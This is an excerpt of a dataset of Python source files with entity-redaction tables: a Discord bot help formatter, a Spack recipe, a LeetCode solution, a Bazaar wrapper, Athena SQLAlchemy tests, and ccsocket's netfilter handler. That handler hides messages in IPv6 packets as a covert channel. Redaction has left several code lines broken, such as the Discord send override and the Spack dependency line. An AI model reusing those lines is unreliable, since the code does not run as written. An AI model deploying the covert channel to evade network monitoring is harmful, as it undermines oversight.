'datetime.datetime.no'], ['URL', 'm.gr'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'os.path.jo'], ['URL', 'self.pa'], ['URL', 'self.pe'], ['URL', 'date.ye'], ['URL', 'date.mo'], ['URL', 'self.pa']]" +58,"# coding=utf-8 +""""""Overrides for Discord.py classes"""""" +import contextlib +import inspect +import io +import itertools +import re + +import discord +from discord.ext.commands import HelpFormatter as HelpF, Paginator, Command +from bot.utils import polr, privatebin + +from bot.utils.args import ArgParseConverter as ArgPC + + +def create_help(cmd, parser): + """"""Creates an updated usage for the help command"""""" + default = cmd.params['args'].default + if cmd.signature.split(""["")[-1] == f""args={default}]"" if default else ""args]"": + sio = io.StringIO() + with contextlib.redirect_stdout(sio): + parser.print_help() + sio.seek(0) + s = sio.read() + # Strip the filename and trailing newline from help text + arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1] + k = cmd.qualified_name + spt = len(k.split()) + # Remove a duplicate command name + leading arguments + split_sig = cmd.signature.split()[spt:] + return ""["".join(("" "".join(split_sig)).split(""["")[:-1]) + arg_part + return cmd.usage + + +class HelpFormatter(HelpF): + """"""Custom override for the default help command"""""" + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._paginator = None + + async def format(self): + """"""Handles the actual behaviour involved with formatting. + + To change the behaviour, this method should be overridden. + + Returns + -------- + list + A paginated output of the help command. + """""" + self._paginator = Paginator() + + # we need a padding of ~80 or so + + description = self.command.description if not self.is_cog() else inspect.getdoc(self.command) + + if description: + # portion + self._paginator.add_line(description, empty=True) + + if isinstance(self.command, Command): + # + if self.command.params.get(""args"", None) and type(self.command.params['args'].annotation) == ArgPC: + self.command.usage = create_help(self.command, self.command.params['args'].annotation.parser) + signature = self.get_command_signature() + self._paginator.add_line(signature, empty=True) + + # section + if self.command.help: + self._paginator.add_line(self.command.help, empty=True) + + # end it here if it's just a regular command + if not self.has_subcommands(): + self._paginator.close_page() + return self._paginator.pages + + max_width = self.max_name_size + + def category(tup): + """"""Splits the help command into categories for easier readability"""""" + cog = tup[1].cog_name + # we insert the zero width space there to give it approximate + # last place sorting position. + return cog + ':' if cog is not None else '\u200bNo Category:' + + filtered = await self.filter_command_list() + if self.is_bot(): + data = sorted(filtered, key=category) + for category, commands in itertools.groupby(data, key=category): + # there simply is no prettier way of doing this. + commands = sorted(commands) + if len(commands) > 0: + self._paginator.add_line(category) + + self._add_subcommands_to_page(max_width, commands) + else: + filtered = sorted(filtered) + if filtered: + self._paginator.add_line('Commands:') + self._add_subcommands_to_page(max_width, filtered) + + # add the ending note + self._paginator.add_line() + ending_note = self.get_ending_note() + self._paginator.add_line(ending_note) + return self._paginator.pages + + +_mentions_transforms = { + '@everyone': '@\u200beveryone', + '@here': '@\u200bhere' +} + +_mention_pattern = re.compile('|'.join(_mentions_transforms.keys())) + + +def _is_submodule(parent, child): + return parent == child or child.startswith(parent + ""."") + + +async def _default_help_command(ctx, *commands: str): + """"""Shows this message."""""" + bot = ctx.bot + destination = ctx.message.author if bot.pm_help else ctx.message.channel + + def repl(obj): + return _mentions_transforms.get(obj.group(0), '') + + # help by itself just lists our own commands. + if len(commands) == 0: + pages = await bot.formatter.format_help_for(ctx, bot) + elif len(commands) == 1: + # try to see if it is a cog name + name = _mention_pattern.sub(repl, commands[0]) + command = None + if name in bot.cogs: + command = bot.cogs[name] + else: + command = bot.all_commands.get(name) + if command is None: + await destination.send(bot.command_not_found.format(name)) + return + + pages = await bot.formatter.format_help_for(ctx, command) + else: + name = _mention_pattern.sub(repl, commands[0]) + command = bot.all_commands.get(name) + if command is None: + await destination.send(bot.command_not_found.format(name)) + return + + for key in commands[1:]: + try: + key = _mention_pattern.sub(repl, key) + command = command.all_commands.get(key) + if command is None: + await destination.send(bot.command_not_found.format(key)) + return + except AttributeError: + await destination.send(bot.command_has_no_subcommands.format(command, key)) + return + + pages = await bot.formatter.format_help_for(ctx, command) + + if bot.pm_help is None: + characters = sum(map(len, pages)) + # modify destination based on length of pages. + if characters > 1000: + destination = ctx.message.author + + for page in pages: + try: + await destination.send(page) + except discord.Forbidden: + destination = ctx.message.channel + await destination.send(page) + + +old_send = discord.abc.Messageable.send + + +async def send(self, content=None, **kwargs): + """"""Overrides default send method in order to create a paste if the response is more than 2000 characters"""""" + if content is not None and any(x in str(content) for x in [""@everyone"", ""@here""]): + content = content.replace(""@everyone"", dummy@email.com(""@here"", ""@h\u0435re"") + if content is not None and len(str(content)) > 2000: + if content.startswith(""```py""): + content = ""\n"".join(content.split(""\n"")[1:-1]) + paste = await privatebin.upload(content, expires=""15min"", server=self.bot.priv) + if self.bot.polr: + paste = await polr.shorten(paste, **self.bot.polr) + return await old_send(self, f""Hey, I couldn't handle all the text I was gonna send you, so I put it in a paste!"" + f""\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!"", + **kwargs) + else: + return await old_send(self, content, **kwargs) +",7157,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Discord.py'], ['PERSON', 'sio = io.'], ['PERSON', 'StringIO'], ['LOCATION', 'parser.print_help'], ['PERSON', 'self.is_cog'], ['PERSON', 'self.is_bot'], ['LOCATION', 'bot.pm_help'], ['LOCATION', 'bot.pm_help'], ['DATE_TIME', '15 minutes'], ['URL', 'Discord.py'], ['URL', 'discord.ext.com'], ['URL', 'bot.utils.ar'], ['URL', 'cmd.pa'], ['URL', 'cmd.si'], ['URL', 'io.St'], ['URL', 'contextlib.red'], ['URL', 'parser.pr'], ['URL', 'sio.se'], ['URL', 'sio.re'], ['URL', 'cmd.si'], ['URL', 'cmd.us'], ['URL', 'self.command.de'], ['URL', 'self.is'], ['URL', 'inspect.ge'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'self.command.params.ge'], ['URL', 'self.command.pa'], ['URL', 'self.command.us'], ['URL', 'self.com'], ['URL', 'self.command.pa'], ['URL', '.annotation.pa'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.cl'], ['URL', 'paginator.pa'], ['URL', 'self.ma'], ['URL', 'self.fi'], ['URL', 'self.is'], ['URL', 'itertools.gr'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'paginator.pa'], ['URL', 're.com'], ['URL', 'transforms.ke'], ['URL', 'child.st'], ['URL', 'ctx.bo'], ['URL', 'ctx.message.au'], ['URL', 'bot.pm'], ['URL', 'ctx.message.ch'], ['URL', 'transforms.ge'], ['URL', 'obj.gr'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.co'], ['URL', 'bot.co'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'pattern.su'], ['URL', 'command.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'subcommands.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'bot.pm'], ['URL', 'ctx.message.au'], ['URL', 'destination.se'], ['URL', 'discord.Fo'], ['URL', 'ctx.message.ch'], ['URL', 'destination.se'], ['URL', 'discord.abc.Messageable.se'], ['URL', 'content.re'], ['URL', 'email.com'], ['URL', 'content.st'], ['URL', 'self.bot.pr'], ['URL', 'self.bo'], ['URL', 'polr.sh'], ['URL', 'self.bo']]" +59,"############################################################################## +# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC. +# Produced at the Lawrence Livermore National Laboratory. +# +# This file is part of Spack. +# Created by Todd Gamblin, dummy@email.com, All rights reserved. +# LLNL-CODE-647188 +# +# For details, see https://github.com/llnl/spack +# Please also see the NOTICE and LICENSE files for our notice and the LGPL. +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License (as +# published by the Free Software Foundation) version 2.1, February 1999. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and +# conditions of the GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public +# License along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +############################################################################## +from spack import * + + +class RLimma(RPackage): + """"""Data analysis, linear models and differential expression + for microarray data."""""" + + homepage = ""https://www.bioconductor.org/packages/limma/"" + url = ""https://git.bioconductor.org/packages/limma"" + list_url = homepage + + version('3.32.10', git='https://git.bioconductor.org/packages/limma', commit='PI:KEY') + version('3.32.6', 'PI:KEY') + + depends_on(dummy@email.com', dummy@email.com') +",1694,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://git.bioconductor.org/packages/limma""'], ['URL', ""https://git.bioconductor.org/packages/limma',""], ['DATE_TIME', '2013-2017'], ['PERSON', 'Todd Gamblin'], ['DATE_TIME', 'February 1999'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['URL', 'https://github.com/llnl/spack'], ['URL', 'https://www.bioconductor.org/packages/limma/""'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com']]" +60,"#!/usr/bin/env python +# -*- coding: utf-8 -*- +''' +***************************************** +Author: zhlinh +Email: dummy@email.com +Version: 0.0.1 +Created Time: 2016-03-11 +Last_modify: 2016-03-11 +****************************************** +''' + +''' +Given a 2D board containing 'X' and 'O', +capture all regions surrounded by 'X'. + +A region is captured by flipping all 'O's +into 'X's in that surrounded region. + +For example, +X X X X +X O O X +X X O X +X O X X +After running your function, the board should be: + +X X X X +X X X X +X X X X +X O X X +''' + +class Solution(object): + def solve(self, board): + """""" + :type board: List[List[str]] + :rtype: void Do not return anything, modify board in-place instead. + """""" + m = len(board) + if m < 2: + return + n = len(board[0]) + for i in range(m): + self.helper(board, i, 0, m, n) + if n > 1: + self.helper(board, i, n - 1, m, n) + for j in range(n): + self.helper(board, 0, j, m, n) + if m > 1: + self.helper(board, m - 1, j, m, n) + for i in range(m): + for j in range(n): + if board[i][j] == 'O': + board[i][j] = 'X' + if board[i][j] == '1': + board[i][j] = 'O' + + def helper(self, board, i, j, m, n): + if board[i][j] == 'O': + board[i][j] = '1' + # trick here, normally it could be i >= 1. + # but the boardary will alays get checked. + # so i == 1, then check 0 is duplicated. + if i > 1: + self.helper(board, i - 1, j, m, n) + if i < m - 2: + self.helper(board, i + 1, j, m, n) + if j > 1: + self.helper(board, i, j - 1, m, n) + if j < n - 2: + self.helper(board, i, j + 1, m, n) +",1908,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016-03-11'], ['DATE_TIME', '2016-03-11'], ['URL', 'email.com']]" +61,"#!/usr/bin/python +# -*- coding: UTF-8 -*- +## This file is part of ccsocket +## Copyright (C) Tomas Dragoun dummy@email.com +## This program is published under a GPLv3 license +######################################################## + + +import nfqueue +import sys +import signal +from multiprocessing import Process, Pipe, Lock +from socket import AF_INET6 +from scapy.all import * +from scapy.layers.inet6 import ICMPv6Unknown +from headers import IPv6ExtHdrAH +from constants import Constants + +############################ +## ## +## NFQHandler ## +## ## +############################ + +class NFQHandler(Process): +#---------------------------------------------------------------------------------- + ''' + This class handles netfilter queue. Is connected with a parent process + via pipe. Messages are decoded and removed from incoming packets, data + are send to pipe. In passive mode intercept queue both incoming outgo- + ing traffic. Inherits multiprocessing.Process + ''' +#---------------------------------------------------------------------------------- + def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address): + ''' Call parent's constructor at first ''' + Process.__init__(self) # init parent (multiprocessing.Process) + self.name = 'NFQHandler-port ' + str(address[1]) + self.daemon = True # set process daemonic + ''' Initialize class attributes ''' + self._const = Constants() + self._encoder = encoder # encodes message in packet + self._pipe = pipe # exchange data with parent process via pipe + self._can_send = sendevt # event shared with parent process + self._stop_send = stopevt # event shared with parent process + self._proto = proto # upper-layer protocol + self._active = active # mode + self._host = address[0] + self._port = address[1] + ''' + Folowing steps prepare netfilter queue with _port as queue + number. There is always only one active queue associated + with given number. + ''' + self._queue = nfqueue.queue() # create queue + self._queue.open() # open queue + try: + self._queue.bind(AF_INET6) # set family type AF_INET6 + except: # fails when any other queue already runs + pass + self._queue.set_callback(self.handlepacket) # set queue callback + ''' + Final step raises RuntimeError in case there is some other + queue with the same number active, queue wasn't closed + properly or user's priviledges are insufficient. + ''' + try: + self._queue.create_queue(self._port) + except Exception, e: + raise e +#---------------------------------------------------------------------------------- + def __del__(self): + if self._pipe: # close connection with parent process + self._pipe.close() +#---------------------------------------------------------------------------------- + def destroyqueue(self): + ''' Attempts to close queue ''' + if self._queue: + #print 'stopping queue ' + str(self._port) + self._queue.close() # close queue + self._queue = None +#---------------------------------------------------------------------------------- + def _clear(self): + ''' Removes all data to send from pipe and sets state to idle ''' + while self._pipe.poll(): # clear pipe + self._pipe.recv() + self._can_send.set() + self._stop_send.clear() +#---------------------------------------------------------------------------------- + def run(self): + ''' + Runs endless loop. Every time a packet is occurs in queue + _handlepacket method is called. + + ''' + #print 'starting queue ' + str(self._port) + self._queue.try_run() +#---------------------------------------------------------------------------------- + def handlepacket(self, number, payload): + ''' Queue callback function ''' + packet = IPv6(payload.get_data()) # decode packet from queue as IPv6 + ''' + Check if packet belongs to this queue - upperlayer ID field must match + in active mode. + ''' + modify, reroute = self._checkport(packet) + if not modify: + ''' + Reroute packet to correct queue. Verdict NF_QUEUE is 32-bit + number. Lower 16 bits code this verdict and upper 16 bits + are used to identify target queue. + ''' + if reroute != -1: + error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16)) + if not error: + return + ''' + Packet doesn't have icmp echo layer or target port isn't active, + accept packet + ''' + payload.set_verdict(nfqueue.NF_ACCEPT) + return + ''' + Port is ok, we need to check if address matches. Ip6tables rules filter + addresses, but packet might have been rerouted from other queue. + ''' + if len(self._host): # check source/destination address + if packet.src != self._host and packet.dst != self._host: + payload.set_verdict(nfqueue.NF_ACCEPT) + return + ''' + Nfqueue mark is used to distinguish between incoming and outgoing + packets. Each packet is marked. + ''' + mark = payload.get_nfmark() # get mark of this packet + if mark == 1: # incoming packet + self._incoming(packet, payload) + elif mark == 2: # outgoing packet + self._outgoing(packet, payload) +#---------------------------------------------------------------------------------- + def _incoming(self, packet, payload): + message = self._encoder.getmessage(packet) # decode message + if message is None: # no message + ''' Accept packet ''' + payload.set_verdict(nfqueue.NF_ACCEPT) + else: + ''' Remove message and pass modified packet to queue ''' + modified_packet = self._encoder.removemessage(packet) + payload.set_verdict_modified(nfqueue.NF_ACCEPT, + str(modified_packet), + len(modified_packet)) + try: + if not len(message): + return + except: + pass + self._pipe.send((message, (packet.src, self._port, 0, 0))) +#---------------------------------------------------------------------------------- + def _outgoing(self, packet, payload): + if self._stop_send.is_set(): + self._clear() + if self._pipe.poll(): # any data to send? + message = self._pipe.recv() # get message + ''' Encode message and return modified packet to queue ''' + modified_packet = self._encoder.addmessage(message, (packet, None)) + payload.set_verdict_modified(nfqueue.NF_ACCEPT, + str(modified_packet), + len(modified_packet)) + if not self._pipe.poll(): # sending finished + self._can_send.set() + else: # nothing to send, return packet to queue + payload.set_verdict(nfqueue.NF_ACCEPT) +#---------------------------------------------------------------------------------- + def _checkport(self, packet): + ''' + Returns tuple (bool, value). True, if packet belongs to this queue. In pa- + ssive mode always returns True. In active mode upperlayer id field must ma- + tch current _port number. Value is number of queue where will be packet re- + routed. + ''' + ''' Passive mode - override icmp id check ''' + if not self._active: + return (True, 0) + + ''' Active mode - check icmp (or fragment) id field (~ represents port) ''' + if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest + id = packet[ICMPv6EchoRequest].id + elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply + id = packet[ICMPv6EchoReply].id + elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet + id = packet[IPv6ExtHdrFragment].id + elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH): + type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH + if type != 128 and type != 129: + return (False, -1) # accept packet + packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest) + id = packet[ICMPv6EchoRequest].id + elif self._proto == self._const.PROTO_ALL: # any protocol + return (True, 0) # id matches port number + else: + return (False, -1) # accept packet + + if id == self._port: + return (True, 0) # id matches port number + else: + return (False, id) # reroute to correct queue +#---------------------------------------------------------------------------------- +",9616,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Tomas Dragoun'], ['PERSON', 'GPLv3'], ['LOCATION', '#'], ['LOCATION', '#'], ['LOCATION', 'stopevt'], ['PERSON', 'self._active'], ['PERSON', 'Verdict NF_QUEUE'], ['PERSON', 'upperlayer ICMPv6EchoRequest\n i'], ['PERSON', 'AH'], ['URL', 'email.com'], ['URL', 'scapy.al'], ['URL', 'scapy.layers.in'], ['URL', 'multiprocessing.Pro'], ['URL', 'multiprocessing.Pro'], ['URL', 'self.na'], ['URL', 'queue.bi'], ['URL', 'queue.se'], ['URL', 'queue.cr'], ['URL', 'pipe.cl'], ['URL', 'queue.cl'], ['URL', 'pipe.re'], ['URL', 'send.se'], ['URL', 'send.cl'], ['URL', 'queue.tr'], ['URL', 'payload.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'packet.sr'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.ge'], ['URL', 'encoder.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'encoder.re'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'pipe.se'], ['URL', 'packet.sr'], ['URL', 'send.is'], ['URL', 'pipe.re'], ['URL', 'encoder.ad'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'send.se'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'const.PRO']]" +62,"############################################################################### +# Name: Cody Precord # +# Purpose: SourceControl implementation for Bazaar # +# Author: Cody Precord dummy@email.com # +# Copyright: (c) 2008 Cody Precord dummy@email.com # +# License: wxWindows License # +############################################################################### + +""""""Bazaar implementation of the SourceControl object """""" + +__author__ = ""Cody Precord dummy@email.com"" +__revision__ = ""$Revision: 867 $"" +__scid__ = ""$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $"" + +#------------------------------------------------------------------------------# +# Imports +import os +import datetime +import re +import time + +# Local imports +from SourceControl import SourceControl, DecodeString + +#------------------------------------------------------------------------------# + +class BZR(SourceControl): + """""" Bazaar source control class """""" + name = 'Bazaar' + command = 'bzr' + ccache = list() # Cache of paths that are under bazaar control + repocache = dict() + + def __repr__(self): + return 'BZR.BZR()' + + def getAuthOptions(self, path): + """""" Get the repository authentication info """""" + output = [] + return output + + def getRepository(self, path): + """""" Get the repository of a given path """""" + if path in self.repocache: + return self.repocache[path] + + if not os.path.isdir(path): + root = os.path.split(path)[0] + else: + root = path + + while True: + if not root: + break + + if os.path.exists(os.path.join(root, '.bzr')): + break + else: + root = os.path.split(root)[0] + + # Cache the repo of this path for faster lookups next time + self.repocache[path] = root + return root + + def isControlled(self, path): + """""" Is the path controlled by BZR? """""" + t1 = time.time() + # Check for cached paths to speed up lookup + if path in self.ccache: + return True + + if not os.path.isdir(path): + root = os.path.split(path)[0] + else: + root = path + + last = False + while True: + if os.path.exists(os.path.join(root, '.bzr')): + # If a containing directory of the given path has a .bzr + # directory in it run status to find out if the file is being + # tracked or not. + retval = False + out = self.run(root + os.sep, ['status', '-S', path]) + if out: + lines = out.stdout.readline() + if lines.startswith('?'): + fname = lines.split(None, 1)[1].strip() + fname = fname.rstrip(os.sep) + retval = not path.endswith(fname) + else: + retval = True + self.closeProcess(out) + + if retval: + self.ccache.append(path) + return retval + elif last: + break + else: + root, tail = os.path.split(root) + # If tail is None or '' then this has gotten to the root + # so mark it as the last run + if not tail: + last = True + + return False + + def add(self, paths): + """""" Add paths to the repository """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['add'] + files) + self.logOutput(out) + self.closeProcess(out) + + def checkout(self, paths): + """""" Checkout files at the given path """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['checkout',], files) + self.logOutput(out) + self.closeProcess(out) + + def commit(self, paths, message=''): + """""" Commit paths to the repository """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['commit', '-m', message] + files) + self.logOutput(out) + self.closeProcess(out) + + def diff(self, paths): + """""" Run the diff program on the given files """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['diff'] + files) + self.closeProcess(out) + + def makePatch(self, paths): + """""" Make a patch of the given paths """""" + root, files = self.splitFiles(paths) + patches = list() + for fname in files: + out = self.run(root, ['diff', fname]) + lines = [ line for line in out.stdout ] + self.closeProcess(out) + patches.append((fname, ''.join(lines))) + return patches + + def history(self, paths, history=None): + """""" Get the revision history of the given paths """""" + if history is None: + history = [] + + root, files = self.splitFiles(paths) + for fname in files: + out = self.run(root, ['log', fname]) + logstart = False + if out: + for line in out.stdout: + self.log(line) + if line.strip().startswith('-----------'): + logstart = False + current = dict(path=fname, revision=None, + author=None, date=None, log=u'') + history.append(current) + elif line.startswith('message:'): + logstart = True + elif logstart: + current['log'] += DecodeString(line) + elif line.startswith('revno:'): + current['revision'] = DecodeString(line.split(None, 1)[-1].strip()) + elif line.startswith('committer:'): + author = line.split(None, 1)[-1] + current['author'] = DecodeString(author.strip()) + elif line.startswith('timestamp:'): + date = line.split(None, 1)[-1] + current['date'] = self.str2datetime(date.strip()) + else: + pass + self.logOutput(out) + self.closeProcess(out) + return history + + def str2datetime(self, tstamp): + """""" Convert a timestamp string to a datetime object """""" + parts = tstamp.split() + ymd = [int(x.strip()) for x in parts[1].split('-')] + hms = [int(x.strip()) for x in parts[2].split(':')] + date = ymd + hms + return datetime.datetime(*date) + + def remove(self, paths): + """""" Recursively remove paths from repository """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['remove', '--force'] + files) + self.logOutput(out) + + def status(self, paths, recursive=False, status=dict()): + """""" Get BZR status information from given file/directory """""" + codes = {' ':'uptodate', 'N':'added', 'C':'conflict', 'D':'deleted', + 'M':'modified'} + root, files = self.splitFiles(paths) + # -S gives output similar to svn which is a little easier to work with + out = self.run(root, ['status', '-S'] + files) + repo = self.getRepository(paths[0]) + relpath = root.replace(repo, '', 1).lstrip(os.sep) + unknown = list() + if out: + for line in out.stdout: + self.log(line) + txt = line.lstrip(' +-') + + # Split the status code and relative file path + code, fname = txt.split(None, 1) + fname = fname.replace(u'/', os.sep).strip().rstrip(os.sep) + fname = fname.replace(relpath, '', 1).lstrip(os.sep) + code = code.rstrip('*') + + # Skip unknown files + if code == '?': + unknown.append(fname) + continue + + # Get the absolute file path + current = dict() + + try: + current['status'] = codes[code] + status[fname] = current + except KeyError: + pass + + # Find up to date files + unknown += status.keys() + for path in os.listdir(root): + if path not in unknown: + status[path] = dict(status='uptodate') + + self.logOutput(out) + return status + + def update(self, paths): + """""" Recursively update paths """""" + root, files = self.splitFiles(paths) + out = self.run(root, ['update'] + files) + self.logOutput(out) + + def revert(self, paths): + """""" Recursively revert paths to repository version """""" + root, files = self.splitFiles(paths) + if not files: + files = ['.'] + out = self.run(root, ['revert'] + files) + self.logOutput(out) + + def fetch(self, paths, rev=None, date=None): + """""" Fetch a copy of the paths' contents """""" + output = [] + for path in paths: + if os.path.isdir(path): + continue + root, files = self.splitFiles(path) + + options = [] + if rev: + options.append('-r') + options.append(str(rev)) + + if date: + # Date format YYYY-MM-DD,HH:MM:SS + options.append('-r') + options.append('date:%s' % date) + + out = self.run(root, ['cat'] + options + files) + if out: + output.append(out.stdout.read()) + self.logOutput(out) + else: + output.append(None) + return output +",9977,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Cody Precord '], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['DATE_TIME', '2009-05-06'], ['LOCATION', 'self.ccache'], ['PERSON', 'fname = lines.split(None'], ['PERSON', 'fname'], ['PERSON', 'logstart'], ['PERSON', '= line.split(None'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'BZR.py'], ['URL', 'BZR.BZ'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'self.cc'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'self.ru'], ['URL', 'os.se'], ['URL', 'out.stdout.re'], ['URL', 'lines.st'], ['URL', 'fname.rs'], ['URL', 'os.se'], ['URL', 'self.cl'], ['URL', 'self.cc'], ['URL', 'os.pa'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'author.st'], ['URL', 'line.st'], ['URL', 'self.st'], ['URL', 'date.st'], ['URL', 'self.cl'], ['URL', 'x.st'], ['URL', 'x.st'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'self.ge'], ['URL', 'root.re'], ['URL', 'os.se'], ['URL', 'out.st'], ['URL', 'line.ls'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'os.se'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'code.rs'], ['URL', 'status.ke'], ['URL', 'os.li'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'os.path.is'], ['URL', 'self.ru'], ['URL', 'out.stdout.re']]" +63,"# -*- coding: utf-8 -*- +import re +import unittest +import uuid +from datetime import date, datetime +from decimal import Decimal +from urllib.parse import quote_plus + +import numpy as np +import pandas as pd +import sqlalchemy +from sqlalchemy import String +from sqlalchemy.engine import create_engine +from sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError +from sqlalchemy.sql import expression +from sqlalchemy.sql.schema import Column, MetaData, Table +from sqlalchemy.sql.sqltypes import ( + BIGINT, + BINARY, + BOOLEAN, + DATE, + DECIMAL, + FLOAT, + INTEGER, + STRINGTYPE, + TIMESTAMP, +) + +from tests.conftest import ENV, SCHEMA +from tests.util import with_engine + + +class TestSQLAlchemyAthena(unittest.TestCase): + """"""Reference test case is following: + + https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py + https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py + https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py + """""" + + def create_engine(self, **kwargs): + conn_str = ( + ""awsathena+rest://athena.{region_name}.amazonaws.com:443/"" + + ""{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}"" + + ""&compression=snappy"" + ) + if ""verify"" in kwargs: + conn_str += ""&verify={verify}"" + if ""duration_seconds"" in kwargs: + conn_str += ""&duration_seconds={duration_seconds}"" + if ""poll_interval"" in kwargs: + conn_str += ""&poll_interval={poll_interval}"" + if ""kill_on_interrupt"" in kwargs: + conn_str += ""&kill_on_interrupt={kill_on_interrupt}"" + return create_engine( + conn_str.format( + region_name=ENV.region_name, + schema_name=SCHEMA, + s3_staging_dir=quote_plus(ENV.s3_staging_dir), + s3_dir=quote_plus(ENV.s3_staging_dir), + **kwargs + ) + ) + + @with_engine() + def test_basic_query(self, engine, conn): + rows = conn.execute(""SELECT * FROM one_row"").fetchall() + self.assertEqual(len(rows), 1) + self.assertEqual(rows[0].number_of_rows, 1) + self.assertEqual(len(rows[0]), 1) + + @with_engine() + def test_reflect_no_such_table(self, engine, conn): + self.assertRaises( + NoSuchTableError, + lambda: Table(""this_does_not_exist"", MetaData(bind=engine), autoload=True), + ) + self.assertRaises( + NoSuchTableError, + lambda: Table( + ""this_does_not_exist"", + MetaData(bind=engine), + schema=""also_does_not_exist"", + autoload=True, + ), + ) + + @with_engine() + def test_reflect_table(self, engine, conn): + one_row = Table(""one_row"", MetaData(bind=engine), autoload=True) + self.assertEqual(len(one_row.c), 1) + self.assertIsNotNone(one_row.c.number_of_rows) + + @with_engine() + def test_reflect_table_with_schema(self, engine, conn): + one_row = Table(""one_row"", MetaData(bind=engine), schema=SCHEMA, autoload=True) + self.assertEqual(len(one_row.c), 1) + self.assertIsNotNone(one_row.c.number_of_rows) + + @with_engine() + def test_reflect_table_include_columns(self, engine, conn): + one_row_complex = Table(""one_row_complex"", MetaData(bind=engine)) + version = float( + re.search(r""^([\d]+\.[\d]+)\..+"", sqlalchemy.__version__).group(1) + ) + if version <= 1.2: + engine.dialect.reflecttable( + conn, one_row_complex, include_columns=[""col_int""], exclude_columns=[] + ) + elif version == 1.3: + # 